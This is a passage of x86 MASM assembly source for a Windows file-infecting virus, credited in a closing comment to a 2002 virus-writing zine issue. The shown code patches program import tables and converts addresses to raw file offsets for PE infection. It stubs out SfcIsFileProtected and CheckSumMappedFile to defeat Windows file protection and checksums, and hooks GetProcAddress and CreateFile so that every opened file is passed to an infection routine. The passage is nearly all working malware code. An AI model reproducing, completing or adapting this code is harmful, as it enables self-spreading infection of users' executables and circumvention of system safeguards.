.ENDIF
add ebx, 12
.UNTILCXZ
; Secondly, loop through, always overwrite previously saved
; 'possible replacement' information with perfect matches.
lea ebx, [edx][VX.sLoadLibraryA]
mCompareStringA ebx, esi
je SetupImportsStore
lea ebx, [edx][VX.sGetProcAddress]
mCompareStringA ebx, esi
je SetupImportsStore
; Calculate the string size and the 'possible replacement'.
xor eax, eax
mov eax, esi
@@: inc eax
cmp byte ptr [eax][-1], 0
jne @B
sub eax, esi
.IF (eax < BUFFER_SIZE)
.IF (eax > 16)
cmp [edx][VX.pGetProcAddress], 0
je SetupImportsStore
.ENDIF
.IF (eax > 14)
lea ebx, [edx][VX.sLoadLibraryA]
cmp [edx][VX.pLoadLibraryA], 0
.IF (ZERO?)
SetupImportsStore:
mov [ebx][- (BUFFER_SIZE + 8)], esi
push [edx][VX.ThunkArrayRVA]
pop [ebx][-4]
.ENDIF
.ENDIF
.ENDIF
pop ecx
pop esi
.ENDIF
inc ecx
.ENDW
; Loop through twice, copying import address string into the virus, and
; the virus string over the original. Make eax nonzero, if all's okay.
lea edi, [edx][VX.bLoadLibraryA]
xor ebx, ebx
@@: cmp dword ptr [edi][BUFFER_SIZE][4], 0
je SetupImportsExit
mov esi, [edi]
push esi
mov ecx, BUFFER_SIZE
cld
rep movsb
lea esi, [edi][8]
mov ecx, [edi]
pop edi
rep movsb
lea edi, [edx][VX.bGetProcAddress]
dec ebx
jpe @B
dec eax
SetupImportsExit:
ret
SetupImports ENDP
; =============================================================================
; ( Align to boundary ) =======================================================
; =============================================================================
; Align a value to a boundary, I was guessing, so let's hope it's not buggy!!!!
ConvertAlign PROC BOUNDARY:DWORD, VALUE:DWORD
mov eax, [VALUE]
xor edx, edx
mov ecx, [BOUNDARY]
div ecx
or edx, edx
mov eax, [VALUE]
jz ConvertAlignExit
add eax, [BOUNDARY]
ConvertAlignExit:
sub eax, edx
ret
ConvertAlign ENDP
; =============================================================================
; ( Convert RVA to RAW ) ======================================================
; =============================================================================
ConvertToRaw PROC FILEHANDLE:DWORD, VALUE:DWORD
; Make sure we haven't been provided a dud value, most routines should just
; rely on the result of this, instead of doing double error checking.
mov esi, [FILEHANDLE]
mov edi, [VALUE]
test edi, edi
jz ConvertToRawFail
; Locate start of SECTION Table and prepare for looping through them all
add esi, [esi][IMAGE_DOS_HEADER.e_lfanew]
mov ebx, [esi][PE.SectionAlignment ]
movzx ecx, [esi][PE.NumberOfSections ]
add si, [esi][PE.SizeOfOptionalHeader ]
adc esi, PE.Magic
.REPEAT
; Skip it if this Section starts above our VA
cmp [esi][SECTION.VirtualAddress], edi
ja ConvertToRawNext
; Find out where the section ends in memory, that means taking
; whichever RVA is bigger and SectionAligning it.
mov eax, [esi][SECTION.SizeOfRawData ]
cmp eax, [esi][SECTION.VirtualSize ]
ja @F
mov eax, [esi][SECTION.VirtualSize ]
@@: DO_API ConvertAlign, ebx, eax
add eax, [esi][SECTION.VirtualAddress]
; Jump over this section entry if it ends below our RVA
cmp eax, edi
jbe ConvertToRawNext
; Fail if this entry doesn't exist in the file [could be memory only]
cmp [esi][SECTION.PointerToRawData], 0
je ConvertToRawFail
; Convert raw pointer to VA and add our value's pointers offset to it
mov eax, [FILEHANDLE]
add eax, [esi][SECTION.PointerToRawData]
sub edi, [esi][SECTION.VirtualAddress ]
add eax, edi
jmp ConvertToRawExit
ConvertToRawNext:
add esi, SIZE SECTION
.UNTILCXZ
ConvertToRawFail:
xor eax, eax
ConvertToRawExit:
ret
ConvertToRaw ENDP
; =============================================================================
; ( Alternate SfcIsFileProtected ) ============================================
; =============================================================================
AlternateSfcIsFileProtected PROC P1:DWORD, P2:DWORD
; Alternate SfcIsFileProtected procedure, returns "File Unprotected"
mov eax, FALSE
ret
AlternateSfcIsFileProtected ENDP
; =============================================================================
; ( Alternate CheckSumMappedFile ) ============================================
; =============================================================================
AlternateCheckSumMappedFile PROC P1:DWORD, P2:DWORD, P3:DWORD, P4:DWORD
; Alternate CheckSumMappedFile procedure, returns "NULL Checksum OK"
mov eax, [P4]
mov ebx, NULL
xchg [eax], ebx
mov eax, [P3]
mov [eax], ebx
mov eax, [P1]
add eax, [eax][IMAGE_DOS_HEADER.e_lfanew]
ret
AlternateCheckSumMappedFile ENDP
; =============================================================================
; ( Hooked version of GetProcAddress ) ========================================
; =============================================================================
HookGetProcAddress PROC USES EDX ESI,
DLL:DWORD, PROCEDURE:DWORD
; Work out our delta offset and check to make sure the program is asking
; for a Kernel32.DLL Procedure [which are the only ones we hook].
LOCATE
DO_API tLoadLibraryA PTR [edx][VX.pLoadLibraryA], ADDR [edx][VX.UsedKernel]
cmp eax, [DLL]
.IF (ZERO?)
push ecx
mov ecx, HOOKS_COUNT
lea esi, [edx][VX.HookAPI]
.REPEAT
; Abort if this entry marks the end of the table.
lodsd
lodsd
lodsd
mCompareStringA ADDR [edx][eax][4], [PROCEDURE]
.IF (ZERO?)
mov eax, [esi][-4 ]
lea eax, [edx][eax]
pop ecx
ret
.ENDIF
.UNTILCXZ
pop ecx
.ENDIF
INVOKE tGetProcAddress PTR [edx][VX.pGetProcAddress], [DLL], [PROCEDURE]
ret
HookGetProcAddress ENDP
; =============================================================================
; ( Hooked version of CreateFile ) ============================================
; =============================================================================
HookCreateFileW PROC USES EDX,
FILENAME:DWORD, P2:DWORD, P3:DWORD, P4:DWORD, P5:DWORD, P6:DWORD, P7:DWORD
LOCAL QUALIFIED[MAX_PATH]:BYTE
LOCATE
DO_API tWideCharToMultiByte PTR [edx][VX.pWideCharToMultiByte], NULL, NULL, FILENAME, -1, ADDR [QUALIFIED], MAX_PATH, NULL, NULL
.IF (eax != 0)
DO_API LoadsFile, edx, ADDR [QUALIFIED]
.ENDIF
INVOKE tCreateFileW PTR [edx][VX.pCreateFileW], FILENAME, P2, P3, P4, P5, P6, P7
ret
HookCreateFileW ENDP
HookCreateFileA PROC USES EDX,
FILENAME:DWORD, P2:DWORD, P3:DWORD, P4:DWORD, P5:DWORD, P6:DWORD, P7:DWORD
LOCATE
DO_API LoadsFile, edx, [FILENAME]
INVOKE tCreateFileA PTR [edx][VX.pCreateFileA], FILENAME, P2, P3, P4, P5, P6, P7
ret
HookCreateFileA ENDP
ALIGN 4
Virus_Size EQU $ - Virus_Data
Virus ENDS
END WinMain
COMMENT ` ---------------------------------------------------------------- )=-
-=( Natural Selection Issue #1 --------------- (c) 2002 Feathered Serpents )=-
-=( ---------------------------------------------------------------------- ) `
View Git Blame Copy Permalink